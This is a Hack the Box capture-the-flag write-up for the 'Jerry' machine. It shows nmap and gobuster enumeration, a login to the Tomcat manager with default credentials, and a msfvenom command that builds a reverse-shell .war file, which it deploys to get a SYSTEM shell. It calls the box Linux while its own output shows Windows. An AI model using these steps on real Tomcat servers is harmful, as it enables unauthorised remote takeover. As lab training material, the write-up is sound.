Summary

Jerry is an easy Linux box that can be exploited by abusing Apache Tomcat’s default credentials and gaining access to Tomcat’s manager dashboard from where you can upload .war files. Such a file can be generated with MSFvenom and when deployed it will provide a reverse shell as system.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.105.253

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Nmap shows that Apache Tomcat is used. The index.jsp looks as follows:

Gobuster found the following files/dirs:

http://10.129.105.253:8080/index.jsp (Status: 200)
http://10.129.105.253:8080/docs (Status: 302)
http://10.129.105.253:8080/examples (Status: 302)
http://10.129.105.253:8080/manager (Status: 302)

When navigating to these URLS you have to enter a password with Basic HTTP Authentication. If you enter an incorrect password, the following page is shown:

Credential Discovery

It shows some default credentials, try these for all the URL’s. They work for: http://10.129.105.253:8080/manager/html. This authenticates you to the default tomcat manager dashboard:


Exploitation

On here, you can deploy .war files. This is a very easy method to obtain a reverse shell. A .war file is basically a .zip file and tomcat will unzip it after which it’s contents are executed. To generate a .war reverse shell with msfvenom you can use the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=80 -f war > shell.war

Now you can upload it and verify that it’s deployed after which you can enter the new endpoint either by curl or by your regular browser at:

http://10.129.105.253:8080/shell

This will provide you with a reverse shell as system:

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

This will also give you access to the user and root flags:


Conclusion

This was one of the easiest boxes from Hack the Box in my opinion. Exploiting Apache Tomcat like this is a very common exploitation method so definitely good to know. I hope you learned something from this box and enjoyed the writeup!